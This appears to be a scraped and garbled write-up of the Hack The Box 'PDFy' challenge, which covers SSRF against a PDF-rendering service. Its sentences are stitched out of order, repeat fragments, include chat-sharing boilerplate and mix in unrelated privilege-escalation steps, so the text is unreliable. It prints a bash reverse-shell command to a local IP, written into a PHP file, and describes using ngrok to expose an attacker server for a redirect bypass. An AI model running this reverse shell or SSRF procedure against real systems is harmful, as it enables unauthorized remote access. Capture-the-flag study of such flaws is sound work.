Pdfy Htb Writeup Upd [2021] -
This guide explains how to exploit the on Hack The Box. This easy-rated web challenge features an vulnerable Server-Side Request Forgery (SSRF) vector paired with a Local File Inclusion (LFI) flaw in a PDF-rendering utility.
Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.
Start a local PHP server on your machine on port 80: sudo php -S 0.0.0.0:80 Use code with caution. Copied to clipboard
$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf pdfy htb writeup upd
: Try to point the URL to http://localhost . If the server renders its own internal page, you have confirmed SSRF.
: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.
Use SSRF to interact with this internal service: This guide explains how to exploit the on Hack The Box
With your external listener active and serving the exploit.php script, copy the public URL generated by your tunneling service (e.g., http://serveo.net ). Paste your public URL into the input form. Click Submit .
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
Looking at the basic frontend JavaScript code, the application intercepts the form submission and passes the input URL via a POST request to an API endpoint ( /api/cache ): javascript We modify the config
However, because the PDFy interface only takes a URL rather than raw HTML input, we cannot type an tag directly into the input bar. The target server must query an external URL that we control. 3. The Exploitation Strategy: Redirection Bypass
This public link is valid for 7 days and shares a thread, including any personal information you added. This link or copies made by others cannot be deleted. If you share with third parties, their policies apply. Can’t copy the link right now. Try again later. HTB PDFy Writeups - Blog Manh Tuong
add it to crontab
Alternatively, get a root shell: